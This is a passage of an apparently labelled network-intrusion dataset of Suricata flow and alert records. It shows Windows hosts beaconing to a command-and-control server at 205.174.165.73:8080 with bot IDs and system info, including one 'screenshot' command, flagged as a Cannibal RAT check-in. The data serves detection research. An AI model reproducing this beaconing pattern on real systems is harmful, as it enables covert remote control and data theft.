'AMGxFOsxuKxvNgfuCABFAAAoGPdAAIAGpCrAqAoOza6lScmKH5D1Z5pr33W0lFARAQBkLAAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,392 |
192.168.10.14-51595-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4476904, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:25:49 | 65,251 | Friday | [{'timestamp': '2017-07-07T13:25:50.038712+0000', 'flow_id': 1084911085542677, 'pcap_cnt': 4476904, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51595, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:49.974101+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGPxAAIAGpCXAqAoOza6lScmLH5CjXNq42h0CeFARAQAtXgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:50.038712+0000', 'flow_id': 1084911085542677, 'pcap_cnt': 4476904, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51595, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:49.974101+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGPxAAIAGpCXAqAoOza6lScmLH5CjXNq42h0CeFARAQAtXgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 308 | attack | 1,248,706 |
192.168.10.15-52254-205.174.165.73-8080-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 555, flow_bytes_toclient: 433, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4477731, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10 ; pcap_cnt: 4477733, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 10, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 10, fileinfo_tx_id: 0 | true | Botnet | true | 13:25:50 | 193,584 | Friday | [{'timestamp': '2017-07-07T13:25:50.604517+0000', 'flow_id': 1940335426948214, 'pcap_cnt': 4477731, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52254, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:25:50.412790+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobodAAIAGTpnAqAoPza6lScweH5DOOngX/HJMI1AQAQD2jQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:50.604517+0000', 'flow_id': 1940335426948214, 'pcap_cnt': 4477731, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52254, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 10, 'http_response_body_printable': 'screenshot', 'http_response_body': 'c2NyZWVuc2hvdA=='}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 435, 'bytes_toclient': 373, 'start': '2017-07-07T13:25:50.412790+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobodAAIAGTpnAqAoPza6lScweH5DOOngX/HJMI1AQAQD2jQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 509 | attack | 1,248,809 |
192.168.10.15-52256-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4480334, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:25:52 | 60,877 | Friday | [{'timestamp': '2017-07-07T13:25:52.613579+0000', 'flow_id': 338278265942378, 'pcap_cnt': 4480334, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52256, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:52.553322+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobslAAIAGTlfAqAoPza6lScwgH5AQdC2DgPAl+lARAQCgkQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:25:52.613579+0000', 'flow_id': 338278265942378, 'pcap_cnt': 4480334, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52256, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:25:52.553322+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobslAAIAGTlfAqAoPza6lScwgH5AQdC2DgPAl+lARAQCgkQAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,248,891 |
192.168.10.14-51596-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4482341, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.18.1, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:00 | 90,475 | Friday | [{'timestamp': '2017-07-07T13:26:00.130496+0000', 'flow_id': 1624925914308450, 'pcap_cnt': 4482341, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51596, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:00.040802+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQFAAIAGpCDAqAoOza6lScmMH5B1dBBfRztNFFARAQBt5QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:00.130496+0000', 'flow_id': 1624925914308450, 'pcap_cnt': 4482341, 'event_type': 'alert', 'src_ip': '192.168.10.14', 'src_port': 51596, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:36:07:ee', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc5&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.18.1', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:00.040802+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzUmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE4LjENCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc5&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.18.1\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvNgfuCABFAAAoGQFAAIAGpCDAqAoOza6lScmMH5B1dBBfRztNFFARAQBt5QAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,027 |
192.168.10.15-52257-205.174.165.73-8080-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4482559, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0 | true | Botnet | true | 13:26:01 | 79,911 | Friday | [{'timestamp': '2017-07-07T13:26:01.538838+0000', 'flow_id': 1190283813913541, 'pcap_cnt': 4482559, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52257, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:01.459717+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobs5AAIAGTlLAqAoPza6lScwhH5BWvb4ZNONsfVARAQDPOgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:26:01.538838+0000', 'flow_id': 1190283813913541, 'pcap_cnt': 4482559, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52257, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:26:01.459717+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobs5AAIAGTlLAqAoPza6lScwhH5BWvb4ZNONsfVARAQDPOgAAAAAAAAAA', 'packet_info': {'linktype': 1}}] | 307 | attack | 1,249,050 |
